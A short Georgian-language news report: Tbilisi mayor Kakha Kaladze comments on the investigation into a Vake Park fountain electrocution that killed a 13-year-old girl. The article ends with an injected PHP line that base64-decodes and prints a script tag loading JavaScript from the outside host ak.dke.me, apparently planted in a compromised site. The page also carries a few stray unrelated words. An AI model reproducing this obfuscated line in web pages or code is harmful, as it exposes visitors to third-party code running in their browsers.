celsiusi
ავერსი შნაიდერი
დედაქალაქის მერმა, კახა კალაძემ განაცხადა, გამოძიება დაადგენს რა იყო პრობლემა, რა გაკეთდა და რა - არა. რითაც უპასუხა კითხვას, „დავემორჩილეთ თუ არა საერთაშორისო ენერგოტექნიკური კომისიის წესებს ვაკის პარკის შადრევნის პროექტის განხორციელებისას“.
 
მისივე თქმით, ყველა სამშენებლო სამუშაოს დროს გამოიყენება ის ნორმები, რომელიც არის საქართველოს კანონმდებლობით გაწერილი. 
 
"რაც შეეხება კონკრეტულ შემთხვევას, გამოძიება დაადგენს, რა იყო პრობლემა, რა იყო გაკეთებული, ან რა არა, რამ გამოიწვია ამხელა ტრაგედია და უბედურება. ერთად დაველოდოთ გამოძიებას და ყველა კითხვას გაეცემა პასუხი, როდესაც ექსპერტიზის დასკვნა იქნება“, - აღნიშნავს კალაძე.
 
კითხვაზე, „ენერგეტიკოსმა კალაძემ და მისმა მოადგილე ხმალაძემ, ამხელა გამოცდილებით როგორ ჩაიბარეს ასეთი პროექტი“, კალაძე განმარტავს: „კალაძე ენერგეტიკოსი არ არის, კალაძე არის ძალიან კარგი მენეჯერი, წარმატებული. ენერგეტიკის მინისტრობის დროს გუნდთან ერთად იმდენი გავაკეთეთ, რაც 70-იანი წლების შემდეგ არ გაკეთებულა“.
 
მისივე თქმით, ვაკის პარკში მომხდარი ტრაგედიის საქმეზე „თუ ვინმეს ოდნავი ბრალეულობა გამოიკვეთება, შესაბამისი რეაგირება მოჰყვება“.
 
შეგახსენებთ, რომ მიმდინარე წლის 13 ოქტომბერს, ვაკის პარკში, შადრევანში სამი ბავშვი ბურთის ამოსატანად ჩავიდა, რა დროსაც მათ დენმა დაარტყა. ერთ-ერთი ბავშვი, 13 წლის გოგონა, მარიტა მეფარიშვილი კლინიკაში გარდაიცვალა.
322
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");